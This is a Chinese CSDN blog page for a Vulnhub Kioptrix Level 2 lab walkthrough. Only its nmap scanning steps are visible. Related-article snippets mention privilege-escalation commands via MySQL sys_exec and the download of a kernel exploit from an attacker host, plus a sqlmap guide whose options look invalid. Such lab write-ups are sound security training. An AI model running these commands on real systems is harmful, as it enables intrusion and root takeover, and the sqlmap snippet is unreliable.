Vulnhub-Kioptrix Level 2 打靶

原创 已于 2024-12-07 17:52:04 修改 · 1.9k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #网络安全 #github #apache

于 2024-12-07 17:47:49 首次发布

一、nmap扫描

nmap -sn 192.168.213.0/24     #在靶机打开时和未打开时使用这条命令,判断那个IP为靶机

靶机为192.168.213.133

nmap -sT --min-rate 10000 -p- 192.168.213.133 -oA nmapscans/port

#tcp全端口扫描,速率为10000,结果保存到port中

nmap -sU --min-rate 10000 -p- 192.168.213.133 -oA nmapscans/udp

#进行udp全端口扫描

nmap -sT -v -sC -O -Pn -sV -p22,80,111,443,631,3306 192.168.213.133 -oA nmapscans/detail

#探测端口服务版本

nmap --script=vuln 192.168.213.133 -oA nmapscan/vuln

最低0.47元/天 解锁文章
vuInhub靶场实战系列--Kioptrix Level #2
专注Python编程与网络安全领域,分享原创技术文章与靶机渗透实战经验。以清晰的逻辑解构复杂技术,用深入浅出的笔触呈现:从Python基础到高级特性,从漏洞原理到攻防实践。在这里,代码与安全交织,思考与成长同行。
06-09 1143
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、脚本利用、linux内核提权等内容。p=49Checksum主机发现目录扫描端口扫描netcat监听反弹shelllinux内核提权。
Vulnhub-Kioptrix Level 4 打靶
a2FpX2tr的博客
12-10 888
UDF提权不止有创建新用户并赋予root权限,下面还有几种方法供大家选择: 1. 设置 SUID 位 通过设置 SUID 位,允许普通用户以 root 权限运行某些程序, 例如 /bin/bash: SELECT sys_exec('chmod u+s /bin/bash'); 2.将用户 john 添加到 sudo 组 SELECT sys_exec('/usr/sbin/usermod -aG sudo john'); 3.修改系统登录文件(如 /etc/passwd)将 root 用户的密码直接移除
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
Kioptrix_Level_2 靶机漏洞复现】
mmdlm的博客
09-11 1236
KioptrixLevel2环境中,通过Nmap扫描发现目标主机,利用命令注入和SQL注入漏洞进行渗透,最终实现反弹shell和提权的过程,包括获取系统信息及本地提权漏洞利用。
打靶日记 Kioptix Level 2
2403_88668158的博客
01-26 1223
而 “&&” 是命令连接符,在 Unix - like 系统(如 Linux、BSD 等)中,表示只有当 “&&”前面的命令执行成功时,才会执行后面的命令,“ls” 是用于列出目录内容的命令。可以看到上面的是centos 4的,下面的是centos7的,发现只有中间的是centos4.5的,所以尝试中间的。这里显示命令执行成功,可以知道存在一个命令执行的漏洞,这样就可以去尝试反弹shell。然后回到网站页面,按F12,鼠标右键html,点击编辑为HTML。扫描全网段,发现多出来的就是ip就是靶机的。
Vulnhub-Kioptrix Level 3 打靶方法一
a2FpX2tr的博客
12-08 1487
arp-scan -l 主机发现,确定192.168.213.134为靶机。
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 624
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
Vulnhub-Kioptrix Level 3 打靶方法二
a2FpX2tr的博客
12-09 466
Vulnhub-Kioptrix Level 3 打靶方法一-优快云博客。
Vulnhub Kioptrix Level 1打靶
a2FpX2tr的博客
12-06 559
searchsploit apache mod_ssl 发现能利用的exploit, 远程缓冲区溢出,能拿到shell。发现apache版本为1.3.20,打开网页使用Wappalyzer又发现mod_ssl 版本为2.8.4。在 http://github.com/heltonWernik/OpenLuck 找到编译利用的方法。在靶机上wget http://192.168.213.132:8888/ptrace-kmod.c。#对开放的端口进行详细的探测服务版本,保存到detail中。
VulnHub靶机入门篇--Kioptrix4
2302_78903258的博客
07-28 1478
前面的知识点都跟之前题目差不多,后面出现了sql注入的利用,sqlmap工具的使用,以及获得webshell,在获得webshell之后的提权(数据库提权),以及一些linux的常用命令。
Linux:五种IO模型
2301_80894970的博客
12-27 991
本文介绍了五种I/O模型的理论概念,重点分析了非阻塞I/O和多路转接I/O模式。文章通过钓鱼的生动比喻,阐述了阻塞I/O、非阻塞I/O、信号驱动I/O、多路检测I/O和异步I/O的区别。详细讲解了select、poll和epoll三种多路转接技术的实现原理和代码示例,比较了它们的优缺点。特别深入分析了epoll的水平触发(LT)和边缘触发(ET)两种工作模式,指出ET模式必须配合非阻塞I/O使用才能发挥最佳性能。通过理论讲解和代码实现相结合的方式,全面展示了Linux系统下高效I/O处理的实现方法和技术演进
基于 Linux 内核模块的字符设备互斥访问实验
weixin_57340941的博客
12-30 444
这个信号量实验是。
Linux CFS 调度器深度解析
X
12-30 776
数学模型驱动: 用 vruntime 精确量化公平性简单性: 核心算法简洁优雅, 易于理解和维护自适应性: 自动适应不同负载和工作模式可扩展性: 通过组调度支持复杂场景表5: CFS 调度器的核心优势总结维度传统调度器CFS改进效果公平性基于优先级的时间片按权重的比例公平更精确的公平分配交互性需要启发式识别自然获得良好响应交互进程响应更快吞吐量固定时间片可能浪费动态调整, 减少切换整体吞吐量提升可配置性多个复杂参数主要调整 nice 值用户接口更简单代码维护复杂启发式逻辑。
Linux 实战:从零实现动态进度条(含缓冲区原理与多版本优化)
会当凌绝顶,一览众山小
12-28 2086
Linux 开发中,进度条是最基础也最实用的系统程序之一 —— 无论是文件下载、编译构建还是数据处理,一个直观的动态进度条能极大提升用户体验。但看似简单的进度条,背后藏着行缓冲区、回车换行区别、字符刷新等关键知识点。本文从基础概念入手,先拆解进度条的实现逻辑,再逐步实现 “固定速度” 和 “自适应进度” 两个版本,最后优化细节让进度条更流畅美观,帮你不仅 “会写”,还能 “理解为什么这么写”。
Linux 防火墙配置详解:iptables 与 firewalld 的实战指南
A5互联
12-30 957
在企业级 Linux 运维场景中,防火墙不仅是简单的“开关”,而是关系到网络安全性、业务可用性与性能边界的重要组件。本文以真实项目经验为基础,结合具体硬件配置、产品参数、代码示例和性能评估,全面讲解 `iptables` 与 `firewalld` 的架构差异、实战配置与优化方法,帮助你从一线配置走向深入的性能调优与安全设计。
Linux(redhat7.9)安装KVM虚拟机
两拆
12-27 432
在Redhat7.9系统中通过KVM安装虚拟机
18. 操作系统-Linux-信创
princemilo的博客
12-30 926
在国家信创战略全面推进的大背景下,国产操作系统正加速替代国外系统,广泛应用于政企办公、关键基础设施、云计算、数据中心等核心领域。
Linux固件:简明扼要,用您自己的语言阐述
2501_93209230的博客
12-29 856
例如,Wi-Fi/蓝牙模块中的蓝牙部分就是如此(是的,同一个模块中,蓝牙和 Wi-Fi 模块通常使用不同的固件版本)。蓝牙最初的设计是让主机通过 UART 上的 HCI 协议与控制器通信,而这正是 Linux 内核中蓝牙驱动程序的平台无关部分(我指的是内核源代码中 net/bluetooth 目录下的部分)所依赖的。然而,更多时候,厂商并不在意这一点,也没有明确声明主机和设备之间使用的协议版本。当然,这个话题还有很多其他方面,但这些都是需要进一步研究的特殊情况,通常在调试更具体的问题时才会变得有趣。
linux的ext家族的文件系中,inode是也存放在block中的
最新发布
cici_new_1987的专栏
01-02 191
ext 文件系统会将磁盘空间划分为多个固定大小的块(如 1KB、4KB),并从这些块中专门分配一部分连续区域作为「inode 表」(inode table),每个 inode 占据固定大小的存储空间(通常为 128 字节或 256 字节,具体取决于文件系统配置),而整个 inode 表本身就存储在一个或多个连续的磁盘块中。例如,如果一个文件的大小为1K,而块的大小为4K,那么该文件还是会占用一个块,块中剩下的3K被空闲出来,不能用于存储其他数据。因此,设置块的大小时,需要考虑要存储文件的大小。
VulnHub Kioptrix Level 4 通过sqlmap --os shell提权 的详细打靶过程及相应代码
10-26
VulnHubKioptrix Level 4是一个常见的渗透测试平台,它模拟了一个Linux服务器环境,挑战玩家通过一系列的安全漏洞进行系统级别的权限提升。在这个级别中,其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取数据库shell权限。 **步骤1:识别SQL注入点** 首先,你需要登录到kioptrix服务器,并尝试交互式命令行,可能会发现涉及数据库查询的操作存在输入验证不足,这通常是SQL注入的线索。 **示例命令** (假设使用nc工具连接): ``` nc <Kioptrix IP> <Port> ``` **步骤2:使用sqlmap** 安装sqlmap,你可以使用pip安装: ```bash pip install sqlmap ``` 然后尝试运行sqlmap,传入url和你认为可能的注入点: ```bash sqlmap -u '<URL>' --data='<payload>' --dbs # payload可能是'username=your_username&password=' ``` 这里payload通常包含一些特殊字符,如单引号('), 双引号("),或者空格。 **步骤3:获取数据库信息** 一旦成功注入,sqlmap会尝试列出可用的数据库、表以及获取敏感数据,如用户和密码: ```bash # 获取所有数据库 sqlmap --dbs # 进一步查看特定数据库的表 sqlmap --db=<database_name> --tables # 获取表中的数据 sqlmap --db=<database_name> --table=<table_name> --columns ``` **步骤4:利用shell命令** 如果找到合适的列(比如存放shell路径或可执行文件的列),可以尝试执行SQL命令获取shell,例如: ```bash sqlmap --db=<database_name> --table=<table_name> --column=executable_file --where="id=<target_id>" --dump ``` 这将下载到一个可执行文件,然后尝试使用它作为shell: ```bash wget <file_path> && chmod +x <file_path> && ./<file_path> ``` **注意**: - 操作需谨慎,确保不会触发防火墙或者进一步锁定账户。 - 实际操作过程中可能需要根据服务器的日志和提示调整payload和命令。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值